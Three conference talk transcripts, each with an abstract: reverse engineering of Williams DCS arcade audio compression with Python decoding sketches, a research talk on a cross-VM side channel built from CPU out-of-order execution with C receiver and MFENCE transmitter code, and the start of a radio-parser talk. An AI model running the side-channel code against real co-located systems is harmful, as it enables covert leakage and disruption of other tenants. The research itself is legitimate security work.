MK3, Open Ice, NBA Maximum Hangtime, WWF WrestleMania, and a few other games. There are the four sound ROMs up in the upper left corner, the DSP is to the right of them, and there are three more SRAMs over there. Then in the upper right corner is the DAC and the preamp, and the giant heatsink in the upper right is the audio amp. Here's just a closer view of the DSP and the 10 megahertz crystal, and a closer view of the DAC and the audio amp section. Here's Killer Instinct, which shipped with a hard drive for the graphics and animations and transitions, but curiously the sound in this game was still on the eight yellow-stickered EPROMs in the bottom corner. And, oh yeah, the DSP is right in the middle here, and same thing, three SRAMs. This is a later Seattle board, for NFL Blitz 2000 for example, where it shipped on a hard drive, so there are no sound ROMs anymore; it's completely whatever the file system is. These later systems were backed with DRAM instead of SRAM, and I guess they transfer from the drive to DRAM and then the DSP runs everything out of RAM.
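The two pieces of address arithmetic just described translate directly into code. The constants below are the ones given in the talk; treating the lower byte of the bank-select word as an index of 0x1000-word windows, and the table base 0x4048 as specific to the UMK3 ROMs being discussed, are my readings of it.

ROM_NAMES = ["U2", "U3", "U4", "U5"]

def decode_bank_select(word):
    """Split a 16-bit write to data memory location 0x3000 into (ROM, offset):
    the upper byte selects the ROM modulo 4, the lower byte selects which
    0x1000-word window of that ROM appears in the banked region."""
    rom = ROM_NAMES[((word >> 8) & 0xFF) % 4]
    window = word & 0xFF
    return rom, window * 0x1000          # word offset of that window within the ROM

def lookup_entry_offset(sound_command, table_base=0x4048):
    """Offset in U2 of the 3-byte lookup-table entry for a sound command; the
    DSP reads the table base itself from offset 0x4040 (0x4048 in these ROMs)."""
    return table_base + 3 * sound_command

print(decode_bank_select(0x0203))        # ('U4', 0x3000): a 2 selects U4, per the examples
print(hex(lookup_entry_offset(0x10)))    # 0x4078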
And here's a World Cup Soccer pinball. Williams made a different spin of the board. It looks similar to the MK2 board, but it's not quite the same. Same deal, DSP, the sound ROMs up at the top. I don't know what the second heatsunk chip is there. So basically, with this DCS system design, kind of the parameters or the attributes about it, and this could hold true with almost any audio compression system. What do you want to attain with your design? So, with DCS, early versions were mono, then stereo, then multi-channel, in terms of surround sound style. The polyphony of voices was six, I think all the way from the beginning, at least in the MK3 stuff I was looking at, it's six. So it can play six. It can keep track of six sounds at the same time. So a music track, a voiceover, a couple hits at the same time, whatever else. And then it downmixes all that to mono, for example, and then puts it out the one speaker. Sample rate, 32 kilohertz, 16 bit. The FFT is done in hardware, 16 subbands, 16 buckets basically. The quantization is variable number of bits based on the subband, so it can change how many bits it wants to put into each frequency bucket, based on if it's high frequency and you're not going to hear it, it may allocate zero bits. So the entropy encoding, in this case I think it's Huffman coding, or if you want to extract that to the more general case prefix coding. So that's basically where you'll have values in RAM. The upper byte is a length, and the lower byte is the actual value. So the length basically tells the decoding code to move to advance the bitstream that much length, and then start looking for the next code word in the data stream, the next symbol. Bitstream generation, this is where, so basically there was those lookup table entries, those three byte lookup table entries pointed to sound headers. Those sound headers point to frame headers, and then the frame header includes how many, the first frame header includes how many frames to follow, and then it contains these subband quantization values, which is based effectively like how many bits each bucket should get, and how many subbands are actually in this frame, because if it doesn't need all 16, it won't use them. Then followed by the actual compressed audio data. And then finally the ROM image creation, so this contains the DSP bootloader init code, program code, it's got those compression code word to symbol mapping dictionaries as well as the compressed audio itself, and then this data is split into images and then burnt into the actual e-promes. So a quick compression background based on the subbands and quantization I was talking about. So again, the FFTs use to convert the time domain samples, so that's your amplitude on your Winamp visualization to frequency domain, which is the kind of the equalizer style bar depicting each frequency bucket. The subband coding, like I said, is used to distribute bits based on the frequency bins. High frequency is less perceivable, so you need less bits. And then finally the last step is a lossless entropy coding Huffman, where it's doing those Huffman table lookups, is used to pack those samples into a variable length data stream. And this graph just kind of shows you the different kinds of compression technologies. In this case it's using Huffman for some aspects, it's using subband frequency domain, and it's also using Fourier transform. 
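The entry format just mentioned, with the code length in the upper byte and the decoded value in the lower byte, is enough to sketch a decoder. How the bitstream actually indexes the real DCS dictionaries is not spelled out in the talk, so the fixed-width lookup below is just one common way such a table is driven, and the tiny example code at the end is made up.

def decode_symbols(bitstream: int, nbits: int, table, max_bits: int):
    """Decode a prefix-coded bitstream with a lookup table whose entries pack
    the code length in the upper byte and the symbol in the lower byte.  The
    table is indexed by the next max_bits bits of the stream, and the stream is
    then advanced by the stored code length."""
    out, pos = [], 0
    while pos + max_bits <= nbits:       # a real decoder would pad the tail bits
        window = (bitstream >> (nbits - pos - max_bits)) & ((1 << max_bits) - 1)
        entry = table[window]
        length, value = entry >> 8, entry & 0xFF
        out.append(value)
        pos += length
    return out

# Made-up example code: '0' -> 0x41, '10' -> 0x42, '11' -> 0x43, via a 2-bit lookup.
table = [(1 << 8) | 0x41, (1 << 8) | 0x41, (2 << 8) | 0x42, (2 << 8) | 0x43]
print(bytes(decode_symbols(0b01011, 5, table, max_bits=2)))   # b'ABC'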
So basically, by identifying what can and can't be heard, audio compression discards information that can't be perceived by the human ear. If you know that signals below a particular amplitude at a particular frequency are not audible, you can hide that quantization noise from your brain. A tone at a certain frequency, if it's loud enough, will raise the threshold in a critical frequency band around that frequency, and I'll show you that on the next slide. And then there's the temporal masking effect: masking occurs when a sound raises the audibility threshold for a brief interval preceding and following the sound, so it fools your brain and you won't hear the quieter stuff nearby. This is all in comparison to traditional lossless methods like ZIP or RAR, which don't discard data at any stage of the game, because obviously you don't want to unzip a file and have it come out completely mangled from what you zipped in the first place. So they have good integrity, but they obviously won't compress as small. Here's the masking effect, where a really distinct, intense sound will basically raise the threshold, and anything under this dashed line you won't hear, so you can start tossing those masked tones or frequency components without the brain noticing it too much. This is my take on the DCS encoder. You have the uncompressed audio samples coming in, 32 kilohertz, 16-bit. That goes through the frequency-mapping FFT transformation, and then into the quantization and subband block, which is fed by the perceptual model. This is what's missing if you were trying to make an encoder so you could make your own sounds: you don't know what their masking curve logic is, or how they generated their Huffman tables, and things like that. That was all done offline, not in real time, on a 486-class machine back in the day, and it would take hours to generate the encoded, compressed files, whereas the DSP has to do its part in real time, so there's way more work involved in the encoder, obviously. That then goes to the bitstream generation, which gives you your variable-length bitstream. Decoding is basically the reverse of the other direction: you read in the bitstream, use your compression dictionary to start pulling out the quantization values and the actual audio samples, and then you transform them from the frequency domain back into the time domain with the inverse FFT. So here's a quick screenshot, probably hard to see, of my life for the last several weeks, which is the amazing built-in debugger in the debug build of MAME. Once you have the data off the physical sound ROMs, that's what I used; I don't think this project would have happened if I had to write my own ADSP-2100 disassembler and TI TMS disassembler and whatever. It was too many layers of overwhelming. So I just used this, and it's pretty cool. You've got your 24-bit program memory bus over here, your 16-bit data RAM values up here, and then you can see the 40-bit multiply-and-accumulate unit over here and the 32-bit shifter. I think I already mentioned it, but I do believe IDA has support for the later versions of the DSP family, though I haven't played with it. So, the quick summary of this slide is the DSP boot and initialization process.
Effectively, the DSP goes through a couple of stages before it actually starts running, doing things like installing IRQ handlers, enabling the IRQ that responds when the game CPU talks to the DSP, clearing internal RAM, replacing the reset vector, and then issuing itself a soft reboot. At that point it comes up again in stage two, moves some more areas of memory around, wipes the buffers that get played out to the DAC, the ones holding the actual uncompressed audio, wipes more memory, and configures the serial port hardware going to the DAC. This is effectively the main code loop for the DSP code; this is what it's spending 99% of its life doing. It sits there processing pending TMS sound commands from the game CPU, does some quick sanity checking, and then calculates that base pointer, 0x4048 plus three times the sound command, which lets it index into the EPROM and find where the rest of the sound data is located. Then it parses the sound header more fully, and the frame header. Then it decompresses the frame into a block of data memory, which is simply entropy-decoding the data. These last two steps are done per channel, or per voice, with the confusing terminology, because it can keep track of six sounds at the same time, so it runs them in a loop for each channel before moving on. Then finally it does the IFFT, converting the frequency data back to time data, and scales it down, because when you do an IFFT the samples get louder; that's just the nature of running the process, so you've got to scale them back down. It applies the windowing and overlap functions to smooth the data out between frames so you don't get audible glitches, and then it actually fills the DAC buffers, which eventually get clocked out to the DAC, and the DAC turns them into voltages we can hear through the speaker. Finally it does one last loop to calculate the per-channel volume gains and respond back to the TMS. It is bidirectional, although the overwhelming majority of the time it's not sending any data back to the game CPU. All the memory locations in the brackets beside these steps reference Ultimate Mortal Kombat 3 code; I apologize, I didn't include which revision of the game it is, but it's whatever the most popular one was. So, doing a deeper dive into those commands: the first step, processing the commands, wipes the contents of RAM, checks whether any new commands have come in, and stores them in a circular buffer. IRQ2 fires, as I said, when the game CPU talks to the DSP. The handler validates the command, makes sure it's not anomalous, and stores it in the buffer. Just for trivia, the TMS address at this location is mapped through to the DSP, so if you're ever looking at the game code on the CPU/GPU side, this is the address it writes sound commands to, and they pop out on the other end at the DSP. It basically finds and stores the pointer to the valid sound header by walking that trail of pointers in ROM, and then it checks for more pending sound commands, because this thing can handle several sound commands if they all come in one after another. So, the next stage is finding and parsing the sound and frame headers.
So, like I said, it takes three times the sound command from the CPU, goes into ROM at this location, finds this value, 18183, and then walks to 18183, which is the sound header, and you get this string of bytes here. The interesting stuff in red is the pointer to the frame header, which it has to walk, and this 0147, which is hex 147 frames to follow; the sound is made up of that many frames. Walking the sound header's pointer takes you to 104754, which is the U3 ROM at this offset, and all these strings of orange bytes: the important point is the number of the orange bytes, not necessarily their contents. That tells you how many subband values are in this frame, out of a possible 16 frequency subbands, and a 7F or FF byte means stop parsing this frame, we're done with the subbands. After that in the frame header you have the subband dequantization values, one per subband, compressed, and then the compressed audio data itself comes after those subbands. The remaining frames after that first frame header consist of dequantization values and compressed audio; there are no more headers. And then you're decompressing the frame at that point, entropy-decoding it. A lot of these are just the specific locations for reference, and then you finally jump to this location, which wipes some counters and is ready to handle another sound if it needs to. So effectively what's happening is that it's accumulating the frequency-domain samples for all six channels at the same instant. What you'll get is the music, a scream, and Scorpion's harpoon all accumulated on top of each other, and eventually they have to be scaled down, because it does all of its mixing in the frequency domain, per subband, so per frequency bucket. It's kind of an interesting way of doing it. Then finally, when they're almost done, you do the inverse FFT. The first couple of iterations are unrolled in their code, and that's where the bit-reversed addressing is used, because the FFT's twiddle factors are accessed in scrambled order. It's all standard FFT, nothing fancy, nothing secret they're doing, and then it's got to scale those samples down, because that effect of doing the IFFT makes them too loud. So, yeah, there's just a graph, got to keep moving; this is what it looks like in memory once you do the IFFT.
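A sketch of that header walk in Python, with the byte layout heavily hedged: the talk tells us a sound header carries a frame count (0x147 in the example) and a pointer to the first frame header, and that a frame header begins with up to 16 per-subband bytes terminated by 0x7F or 0xFF, followed by the dequantization values and the packed audio. The field positions and byte order below are placeholders, not the recovered format.

def parse_sound_header(rom: bytes, offset: int):
    """Illustrative parse only: pull a frame count and a frame-header pointer out
    of a sound header.  Which bytes hold which field, and in what order, is a
    placeholder here; only the fields themselves come from the talk."""
    frame_count = int.from_bytes(rom[offset:offset + 2], "big")            # e.g. 0x0147
    frame_header_ptr = int.from_bytes(rom[offset + 2:offset + 5], "big")   # banked ROM address
    return frame_count, frame_header_ptr

def parse_frame_header_subbands(rom: bytes, offset: int):
    """Collect the per-subband bytes of the first frame header; a 0x7F or 0xFF
    byte (or reaching 16 subbands) ends the list.  Whatever follows is the
    dequantization data and the packed audio for the frame."""
    subbands = []
    while len(subbands) < 16 and rom[offset] not in (0x7F, 0xFF):
        subbands.append(rom[offset])
        offset += 1
    return subbands, offset + 1          # offset just past the terminator byte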
And then the last step is it just calculated the gains and then responded back to the CPU, like I said, if it needed to. So yeah, that can trigger pinball lighting, mechanical flippers, things like that. So conclusion, basically using a low-cost DSP allowed high efficiency, good quality audio compression algorithm to be accelerated in hardware. It provided roughly a 10 to 1 compression ratio, so the game audio could still be squeezed into eProms instead of having to think about CD-ROMs or hard drives, but they eventually did go to hard drives. Competing systems were using FM synthesis and low-quality short playback didn't sound that good. And then the DCS system basically allowed the musician the freedom to compose, like they're in a traditional studio, they could use whatever instruments, anything they wanted, because it was just compressed audio at that point. So I think I'm out of time, but I just had some sample clips from Street Fighter and MK3. Do we have any time? We're out of time? Okay, so that is everything, and thank you everyone for sticking around.
|
For a decade from the early 90's to the early 2000's, Williams' Digital Compression System (DCS) audio hardware reigned supreme in arcades and casinos, providing amazing sounding music, voice-overs, and effects, blowing competing systems out of the water. This talk will reverse the DSP hardware, firmware, and algorithms powering the DCS audio compression system, used on Midway coin-ops and Williams/Bally pinballs, like Mortal Kombat II/3/4, Killer Instinct 1/2, Cruis'n USA, and Indiana Jones, among others. A tool called DeDCS will be presented, which can extract, decompress, and convert the proprietary compressed audio data from a DCS game's sound ROMs into regular WAV format, taking you back to '92, when you tossed that first quarter into MKII, and Shao Kahn laughed in your face...
|
10.5446/32808 (DOI)
|
Cool. All right. My name is Sophia Dantouan. In this past year, my master's research at RPI focused on exploiting out of order execution and using that to try and enable cross VM code execution. So it all begins with the cloud. And everyone here is probably pretty familiar with how the cloud is structured. Just to go over some of the basics, you have a bunch of virtual instances or virtual machines, all resting on shared hardware. And that shared hardware, shared resources, is allocated by the hypervisor up to the different operating systems. And that dynamic allocation happens through time. So it's always changing, which reduces costs for everyone. And that means that everyone's happy. So there are a few problems with how this situation is set up. Well, first of all, your data is stored remotely. And it might not be secure or it might be private. That host that you're sharing your data with might be vulnerable itself or untrustable. And then finally, the one that people often talk about is that your VMs, which are running your processes or your data, it co-located with a bunch of other virtual machines that you don't know who they are or what they're doing. And they're all sharing the same physical resources. So it's this physical co-location, which leads to side-chain vulnerabilities. Again, here's the basic hardware structure of the cloud. You have the hypervisor layer, which is in the middle, and it's taking that shared physical layer and dynamically allocating that up to the different operating machines above. So each virtual machine will see its own virtual allocation of that shared hardware. So the universal vulnerabilities with this is in that translation between the physical and the virtual hardware. Because it does happen through time, it's based off of the need of each process or each virtual machine. And this means that one virtual machine can cause contention with another for the same resource. And that basically means that your VMs activities, even if it's just telling someone else that you need physical resource Y, that means that your activities are not paked to someone else on the same hardware. So how can we exploit this? Well, we can use something like in cryptography, a side-channel attack. Is any attack which you can gain information from the surrounding system that's implementing the crypto scheme that you're running or the program that's encrypting something. Now in cloud computing, it's quite similar. It's a hardware-based side channel, which means that the environment, the physical environment surrounding the virtual machines is what's leaking the information. It does mean it's cross-VM, a switch VM, even though it's like a black box to other VMs, they can't query inside of it and they can't directly access anything inside. They can learn about this running environment that that virtual machine is running on. This does mean that the information must be both recordable and also repeatedly recordable. So you have to be able to reliably learn information from that environment and be able to map that to the same known processes or to the same known information with a certain degree of certainty. So you can kind of structure a basic send and receive model out of this, or a basic side channel. So this is hardware agnostic. You have one transmitter which is forcing artifacts. Either it could be knowingly forcing artifacts into the environment or unknowingly forcing artifacts in the environment. 
And that shared hardware is then being read by the receiver or the adversary to learn information about that one sender. So the different ways this can actually be used, if you just have a receiver or if you're just listening to the benign environment noise, you can do things like leaking what processes are running on other virtual machines or keying the environment in which you're on. So you can create a unique signature from the environment and the environment's average usage of the cache, for instance, and use that to ID that specific server that you're running on in the cloud. And that you could use then to determine what physical resource you're running on. Now on the opposite side of the spectrum, if you're just running a transmitter or if you're just forcing artifacts in the shared hardware, you could do something like a denial of service attack where you clog the pipeline or you clog the cache, so other processes that might need it can't. And this can be pretty basic in just forcing someone else out of the cache, but it can actually alter the other execution or the other processes and results. And if you mix these two together, you have something that is more like a communication network. So if someone's forcing patterns in the environment knowingly and someone's receiving those, they can send messages back and forth. And this is what most people think of when they think of side channels. And this is how it would look like. So this is just a simple communication network where you have several virtual machines forcing artifacts in that shared hardware medium, and one VM is then reading those artifacts from the medium and averaging them out to create meaning from them. Just to bring this into a more concrete example, in the cache, there's an attack called a flush and reload attack, and it's targeting the L3 cache tier. The receiver or the adversary, which is listening to the environment, flushes a pre-greed line of L3 cache and then queries it later on for information. And the victim VM, the one that's also using the shared resource, is accessing that same shared line of L3 cache. And in this case, it was doing crypto basically, and accessing that same shared line of L3 cache with its private key. And the adversary was able to leak that private key at the end. If you want to read more about this specific attack, it's on my website. You can read it there. But specifically, my research involves attacking the pipeline. So how can we use the pipeline in a similar way that most people use the cache to create side channels? Well, there's a couple benefits of the pipeline versus the cache. The first is quieter. It's much harder to detect that someone's misusing the pipeline as opposed to the cache, simply because the cache is easier to query or interact with. It's also not affected by noise in the system as much. It's not affected by cache misses or other errors that the system may have. In a super noisy environment, much like the cloud, where tons of processes are just operating normally on the same hardware, the pipeline side channel is actually increased or amplified in strength, which is great. So how are we actually doing this? How are we targeting the pipeline? Well, first of all, the attack factor is we want to create a side channel to exploit inherent properties of this hardware medium. So some things that we can be assured of being there. And this means that we have to have some basic requirements to create a side channel. We have to have shared hardware. 
We have to know we're dynamically allocated that resource, both of which are inherent properties of cloud systems, so that's great. And we have to be co-located with our victim VMs or other collaborating adversaries. And that's something a little harder to determine, but like I said earlier, it is possible. So we're going to assume that going forward. So specifically, we chose to target the processors, the medium, and on the processor, the CPU's pipeline. And the difficulty associated with the pipeline is that we need to query these artifacts or these messages that we're forcing dynamically. So there's no really easy way to query the pipeline for a specific state, because you can't. If you did that, you'd probably be affecting how the pipeline state is. So all we really can know about the pipeline is the instruction set or the instruction order we feed it from our processes in the order of those instructions. And it results from these instruction sets, so we get to know the values that the pipeline can return to us. Which basically means we can use out-of-order execution. And that's the artifact that we're going to be forcing, and then also recording from the pipeline to learn the state of the pipeline as well as to learn about other processes sharing the pipeline with us. This is how it's going to look. So we have a bunch of VMs all running on the shared processor. And like you can see here, the processes are all sharing between two cores. And so this does assume that SMT is turned on, but in most modern systems, that's the case. So it's not a big deal. And then finally, one interesting thought here is that your instructions, especially in the cloud on shared hardware, are all being executed together with instructions from other processes from foreign VMs that you know nothing about. They're all just being processed in the pipeline in one big pool, as if they were all from one big program, which is kind of scary, because it's supposed to be separate. So how are we going to receive out-of-order executions from the pipeline? Well, like all good presentations, we have a picture of the Intel manual. This picture is basically just showing us that we can get a case on the pipeline that is out-of-order execution. So we can get results from the pipeline that are not expected. And that's what we can record. And this is what it looks like specifically in our receiver. So we have two threads, thread one and two, and they're both storing a value to a specific spot memory and then loading from memory. Now, the key thing here is that the load is happening from the opposite location in memory. So it's store of one to X, but the load from X to R2 happens in the other thread. So in the perfect world, the synced thread case, you get R1 and R2 equals one. But more often the case than not, your threads aren't going to be synced. So you can also get a case where some of the store, the store and load of one happens before the store and load of the other. And in that case, you could get either R1 or R2 being one and the other zero. And both of these cases are pretty normal, so we're going to ignore them. However, in the final case, in the out-of-order execution case, the loads are actually reordered in front of the stores. And in that scenario, X and Y were preset to zero, we're going to get R2 and R1 equal to zero as well. And that's the out-of-order execution case we can count. And so this is just the pseudocode of our receiver. 
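Here is a standalone C11 sketch of that same store-then-load experiment, not the authors' receiver: two threads each store 1 and then load the other variable, and any iteration where both loads come back 0 is counted as an observed out-of-order execution. The iteration count and the barrier-per-iteration structure are choices made for the sketch, and it needs two real hardware threads to show anything.

```c
/* Store->load reordering litmus test.  x86 + POSIX threads.  Any iteration
 * where r1 == 0 && r2 == 0 means a load was hoisted above a store. */
#include <pthread.h>
#include <stdatomic.h>
#include <stdio.h>

#define ITERS 1000000L

static atomic_int X, Y;
static int r1, r2;
static pthread_barrier_t start, done;

static void *t1(void *arg)
{
    (void)arg;
    for (long i = 0; i < ITERS; i++) {
        pthread_barrier_wait(&start);
        atomic_store_explicit(&X, 1, memory_order_relaxed);
        __asm__ __volatile__("" ::: "memory");  /* keep the compiler in order */
        r1 = atomic_load_explicit(&Y, memory_order_relaxed);
        pthread_barrier_wait(&done);
    }
    return NULL;
}

static void *t2(void *arg)
{
    (void)arg;
    for (long i = 0; i < ITERS; i++) {
        pthread_barrier_wait(&start);
        atomic_store_explicit(&Y, 1, memory_order_relaxed);
        __asm__ __volatile__("" ::: "memory");
        r2 = atomic_load_explicit(&X, memory_order_relaxed);
        pthread_barrier_wait(&done);
    }
    return NULL;
}

int main(void)
{
    long ooo = 0;
    pthread_t a, b;
    pthread_barrier_init(&start, NULL, 3);
    pthread_barrier_init(&done, NULL, 3);
    pthread_create(&a, NULL, t1, NULL);
    pthread_create(&b, NULL, t2, NULL);

    for (long i = 0; i < ITERS; i++) {
        atomic_store(&X, 0);
        atomic_store(&Y, 0);
        pthread_barrier_wait(&start);   /* release both threads               */
        pthread_barrier_wait(&done);    /* wait for their store/load pairs    */
        if (r1 == 0 && r2 == 0)
            ooo++;                      /* the "impossible" out-of-order case */
    }
    printf("%ld out-of-order executions in %ld iterations\n", ooo, ITERS);
    pthread_join(a, NULL);
    pthread_join(b, NULL);
    return 0;
}
```

On a typical x86 box the printed count comes out nonzero; put an MFENCE between each store and load and it drops to zero, which is exactly the lever the transmitter side uses.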
We're iterating through these two threads thousands and thousands of times in certain timeframes. And when we do this, we can actually get a count of the average number of out-of-order executions received in a specific timeframe. And that's great for us because averages matter. We can take these averages in a specific timeframe and learn what an expected average should be and what an anomalous one would be. So to transmit, or to force patterns in this received average out-of-order execution bitstream that we've now constructed, we have to have the ability to force out-of-order execution averages to increase or decrease. So we're going to actually force the average out-of-order execution count to decrease using memory fences. Now everyone here has probably heard of MFENCE, the x86 instruction. It prevents memory reordering of any kind, which is great because that's what we want to do. We want to decrease the amount of out-of-order executions. It is a more expensive operation, but that's fine because it's going to do what we want. So this is what the pipeline would look like. Our transmitter is forcing these memory fences into the same pipeline as the receiver. Now the key thing here is that these MFENCEs are being shoved in in the same timeframes that our receiver is recording in. So that is one key thing to have. But in this scenario, the MFENCE is going to force the pipeline to store the values of 1 to x and of 1 to y before the loads. So these actually should be flipped, but it's going to force the proper ordering of our instructions. So this brings us to the importance of memory models. There's two different types of memory reordering, compilation time and runtime. Obviously we're focusing on runtime, or the out-of-order execution case where the pipeline is dynamically reordering our instructions. And we're also focusing on the usually-strong memory model of the x86 architecture. This basically means that for the most part the pipeline is going to handle our instructions safely. It's going to give us the results that are expected or correct. However, it's usually strong, which doesn't mean always. And that does mean that we can get that incorrect case, the R1, R2 equals 0. So we're exploiting this inherent property of pipeline optimization. And there's four different types of memory barriers. The specific case that we're focusing on is we want to force the store to occur before the load. However, there are four different types. Unfortunately, the store-load barrier is the most expensive, as is true of most things in life. But to reiterate what we were saying earlier, we want to control out-of-order executions. So we're going to assume SMT is turned on and we're going to use a store-load barrier, an MFENCE, to prevent that out-of-order execution case. So, to decrease the average out-of-order executions that we can read from the pipeline in specific time intervals. And so for our victim, or our transmitter, we're going to force these patterns and affect the order of stores and loads. And like I said earlier, it's time frame dependent. So now we have both the ability to force out-of-order executions on the pipeline as well as to receive. So now we just have to design the channel. In our lab, we had a Xen hypervisor, just because it is the most popular commercial platform. Xeon processors, shared hardware, specifically four cores and six virtual machines. Obviously SMT was turned on. This is what it would look like. 
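The transmitter side boils down to a timed loop: during a timeframe that should read as a 1, keep issuing store/MFENCE/load sequences so that co-scheduled store-load pairs can't reorder; during a 0, stay idle. A minimal x86-only sketch, with a made-up 10 ms timeframe and an illustrative payload, might look like this.

```c
/* Sketch of the MFENCE transmitter.  x86 only; the timeframe length and the
 * bit string are invented values, not the paper's. */
#include <stdatomic.h>
#include <stdio.h>
#include <time.h>

static atomic_int pad;

static int before(const struct timespec *a, const struct timespec *b)
{
    return a->tv_sec < b->tv_sec ||
          (a->tv_sec == b->tv_sec && a->tv_nsec < b->tv_nsec);
}

static void hammer_mfence_until(const struct timespec *deadline)
{
    struct timespec now;
    do {
        atomic_store_explicit(&pad, 1, memory_order_relaxed);
        __asm__ __volatile__("mfence" ::: "memory");   /* store-load barrier */
        (void)atomic_load_explicit(&pad, memory_order_relaxed);
        clock_gettime(CLOCK_MONOTONIC, &now);
    } while (before(&now, deadline));
}

static void idle_until(const struct timespec *deadline)
{
    struct timespec now;
    do { clock_gettime(CLOCK_MONOTONIC, &now); } while (before(&now, deadline));
}

int main(void)
{
    const long frame_ns = 10 * 1000 * 1000;     /* 10 ms per bit (assumed)   */
    const char *bits = "1100101";               /* illustrative payload      */
    struct timespec deadline;
    clock_gettime(CLOCK_MONOTONIC, &deadline);

    for (const char *b = bits; *b; b++) {
        deadline.tv_nsec += frame_ns;
        if (deadline.tv_nsec >= 1000000000L) { deadline.tv_sec++; deadline.tv_nsec -= 1000000000L; }
        if (*b == '1') hammer_mfence_until(&deadline);  /* suppress reordering */
        else           idle_until(&deadline);           /* let it happen       */
        printf("sent bit %c\n", *b);
    }
    return 0;
}
```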
We had our six Windows 7 virtual machines all running noisy operations. And that was just to create similarities between our lab environment and the real world case in which one server might have thousands and thousands of processes on it. All right. Now specifically, if we apply our basic sending and receive model to this, we'd have one VM acting as a sender and one as the receiver. Or in a bi-party communication situation, you'd have one VM having both and the other having both as well. And this, and because our side channel is over the pipeline, these processes, the send and receive, would all have to be assured to be executing on the same pipeline. All right. So to demonstrate this, this is just Windows 7 VM with Zen Center on it so I can connect to my Zen server. And we have our clones here, and they're all just sharing the same amount of hardware, the same space. Oh, and I forgot to say you can follow along if you want. On my website, you can get the send and receiveer Python scripts that I have. These are wrappers around the actual scene assembly code that I use to force and receive out of order executions. However, the Python is great because it helps me easily adjust for the noise in different time frames and things like that during the testing. So in this scenario, we had recon 1 being our receiver. And this is, yeah, so receiver was just, we're going to show it first, just receiving the noise from the system. So we're canceling out the noise from the system, and you can see a bit stream of zero here. So this is just reading from the system, saying there's nothing being forced. I'm going to count these all as zeros, and it's plotting it to a graph, which is part of the Python script. It also sends all the out of order execution averages to a file as well, the Python. And you can see that here. And you can see where the different time frames are, and it looks a little bit more drastic than it actually is. The differences between each time frame's average. However, like I said, each system might have a unique signature, given what different processes are running on it. So you would see different average patterns like that based on what system you're running on. Now to show the communication occurring, our sender is going to force out of order executions in the same time frames that the receiver is sending them. And it's just in this scenario going to send two high bits, and those two high bits are going to trigger something in the receiver. So this is just a simple example to show that it works, but with a little bit of engineering, you could create something a bit more malicious, I guess. So blue screen. All right, so in conclusion, like all good academic papers, we had potential mitigation techniques. But the one that had the most possibility of success was isolating your VMs. So if you have your VMs in separate hardware, then you're definitely not going to be affected by this attack. You could also turn off SMT, and you could also set up a custom hypervisor, which is actually watching to make sure that processes from different virtual machines are not sharing resources at the same time, or if they are separated somehow. However, the downsides to all of this are some of the cloud benefits that you do get from sharing. So in conclusion, our contribution was the largest part of it was creating a novel side channel over the pipeline, even though the cache is a bit more popular, and the pipeline harder to query the state of, it is possible. 
And we show this dynamic method, and we show the application of this in the cloud, as well as some potential mitigation techniques. So I'd like to acknowledge Jeremy Blackthorne from MIT Lincoln Lab for introducing me to this topic, as well as RPI Second Trail of Bits. If there's any questions, you can reach me at IRC, email me, or if you're really adventurous, you can read my thesis. It's on my website. It's all 120 pages of it. So good luck. Or any questions now I can take? Hey, hey, hey. Somebody's got a question. Hang on. Just real quick. What do you define as a noisy environment? When I say noise, I'm basically saying that there's processes or activity in the system that's creating a load in the resource that you're targeting. So like in the case of the cache, you'd have a bunch of other processes shoving values in the cache or using the cache for something. So when you say you simulated a noisy environment, you just had stuff going on. Nothing is particular, right? Yeah, that's what I meant. It's going to be completely different depending on every system you're on, right? Exactly. That's the point. So you want to create an environment with enough processes to create some sort of entropy in the signals that you're reading, just so you know that your noise cancelling algorithms are working or your receiver is not too delicate and things like that. So how can you characterize a normal level of noise? One of these specifics of the environment, so what I did for this case was you just basically take thousands and thousands of recordings from your system and average those together. Have you tried that on, say, EC2 or? We're trying that now, actually. So, I mean, the key thing is that you have to know that you're co-located if you want to do some sort of send receive model. However, you can just download my scripts now and run it on EC2 and record the levels of noise from the systems. You can create a unique signature for that box that you're running on. And based on what noise algorithms and averages you're doing, it would alter the granularity of that signature. However, you could do that right now. And the stability of the patterns that you were observing, again, is there a way to characterize that? The stability of it? So, let's say, did you see any specific pattern for any specific system or processor? Oh, I see. Well, like I said, you can either take systems readings that are unique to that box that you're running on. Or I did see patterns associated with different processes. So, I tested it. Like, you can read this on my thesis. I did a bunch of different attacks. But, in for instance, I tested it on Chrome. So, I would have, like, YouTube open running a bunch of things in 1VM. And you'd actually get a unique signature from that. You wouldn't be able to see what YouTube video they were watching, but you could see that someone was watching something on YouTube. Fascinating. Thank you so much.
|
Given the rise in popularity of cloud computing and platform-as-a-service, vulnerabilities inherent to systems which share hardware resources will become increasingly attractive targets to malicious software authors. This talk first presents a classification of the possible cloud-based side channels which use hardware virtualization. Additionally, a novel side channel exploiting out-of-order-execution in the CPU pipeline is described and implemented. Finally, this talk will show constructions of several adversarial applications and demo two. These applications are deployed across the novel side channel to prove the viability of each exploit. We then analyze successful detection and mitigation techniques of the side channel attacks.
|
10.5446/32809 (DOI)
|
Howdy, y'all. So have any of you read, and I can't see you from here. They have the light set up to help us sympathize with your hangovers, which is really polite of them from your perspective. So since I can't see you, could you please cheer if you have read the Walter M. Miller Jr. novel, A Canticle for Leibowitz? Hey, we got one in the back! Okay, so A Canticle for Leibowitz is about a Jewish electrical engineer who founded a Catholic monastery after an atomic war in order to protect books from the Dark Ages. And the novel takes place 500 years, 1500 years, and 2500 years after the war takes place. Leibowitz is never actually in it. And it describes this morality of smuggling books and reproducing books and sharing books as a fundamental piece of the religious faith of the characters in the novel. So for this talk, we have radio protocols which could conceivably be used in some unlikely post-nuclear future. So there you have it, matryoshka nesting dolls and book-legging bears, if you will. So when you say a radio, I say a parser. I'm not a hardware guy; however, my favorite pastime is seeing how parsers get broken. And radios are parsers too. A radio is this kind of a parser that starts with a physical signal and somehow gets that packet, which some people call a frame, out of it. And just as any parser, it is driven by input that we can generate. We can generate it with expensive radios and sometimes with cheap radios. And if you've been following our work on Zigbee, you should have seen that you can actually generate quite a lot with very cheap radios. And again, those are very simple machines. They don't have all that much extra space, unlike a real parser which can corrupt memory and then have a state explosion in which you can drive pretty much anything, any Turing machine. But they do have some extra state and they do have some unusual behavior. So what is that unusual behavior? Mostly it manifests itself as parser differentials. So in noiseless parsers, and this is important, we're going to see that noise makes it a lot more interesting. So in noiseless parsers, besides the normal behavior where you exploit the thing with crafted input, drive it into a corrupted state, and then you drive it all the way to root shell, to Turing-complete power, maybe or maybe not. So this is the common scenario. But there is another in which you feed two parsers the same signal, the same string, and they produce two different readings of it, two different interpretations of it. Now many 